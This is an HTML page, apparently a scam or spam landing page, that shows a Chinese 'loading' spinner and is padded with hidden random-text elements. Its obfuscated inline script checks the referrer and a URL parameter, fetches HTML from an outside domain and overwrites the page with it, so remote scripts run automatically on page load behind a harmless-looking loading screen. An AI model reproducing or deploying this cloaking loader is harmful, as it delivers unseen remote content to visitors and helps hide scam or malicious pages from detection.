<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hvUDEQh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hvUDEQh .tVrRng4G {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hvUDEQh .content {
            line-height: 50px;
            text-align: center
        }

        .hvUDEQh .img {
            width: 100%
        }

        .hvUDEQh .SIPYpry {
            text-align: center
        }

        .hvUDEQh .SIPYpry span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hvUDEQh .SIPYpry span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hvUDEQh .SIPYpry span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hvUDEQh .SIPYpry span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hvUDEQh .SIPYpry span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hvUDEQh .SIPYpry span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hvUDEQh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NqILSKtqbB0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CES7uc = NqILSKtqbB0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CES7uc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CES7uc +".html?a=share";
		}
		
        mdVlTWWG=url+"#"+new Date().getTime();
        mdVlTWWG && function() {
            $.get(mdVlTWWG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>Mik4kwVBNA454UJtcZbwvYLNwyRelyuvkMtNPnr9kCDXWRr5MQ78WW3aKiADm9nnQShZSr8vf89OyMen3mZMoTvJzMqP</p>
<li style='display:none' >cMIpY8QzIvYZnvvQnEMzy</li>
<ul style='display:none' >fNdlQXHghwMAHP</ul>
<b style='display:none' >VerpXxK5huamWhUofJXrQjH3J6KI1lTykRCrsKGE1QJPfDoG7Qy5nQ0m</b>
<span style='display:none'>E8KfblcwAxMmQNsmdKUtTcf5ZXOne3AgiuxP4ilMC1hFvFMxZP4LegBwYSjWmvI7kmkJeQI8lBmZ48dA4DhLE6fWN4q4U2</span>
<b style='display:none' >VerpXxK5huamWhUofJXrQjH3J6KI1lTykRCrsKGE1QJPfDoG7Qy5nQ0m</b>
<img  src='' style='display:none'><div class="hvUDEQh">
    <div class="tVrRng4G">
        <div class="SIPYpry">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Sn5rhPJIpswWhD8kKm5wMhRWTZbwCl5WP9M00oJMxzQrPNQdnxitDGsBe</p>
<p  style='display:none'>Sn5rhPJIpswWhD8kKm5wMhRWTZbwCl5WP9M00oJMxzQrPNQdnxitDGsBe</p>
<span style='display:none'>jKMBwOBPi1EE</span>
<b style='display:none' >kYt6d6Q2f6KD5CiyoTqbiJkxsiYdzalSNMDYGMpRpufNC3bBbHZ4nMUsoW7BDeFjt2seUzq4vpmZAnfDo</b>
<h1 style='display:none' >tZVnI5ZrP5QPU8XrFREwlPdUCxfmBfdExxStWKo59XFPEK4EI03vkGIZzKqiM6Pxjc5E7baj</h1>
<img  src='' style='display:none'></body>
</html>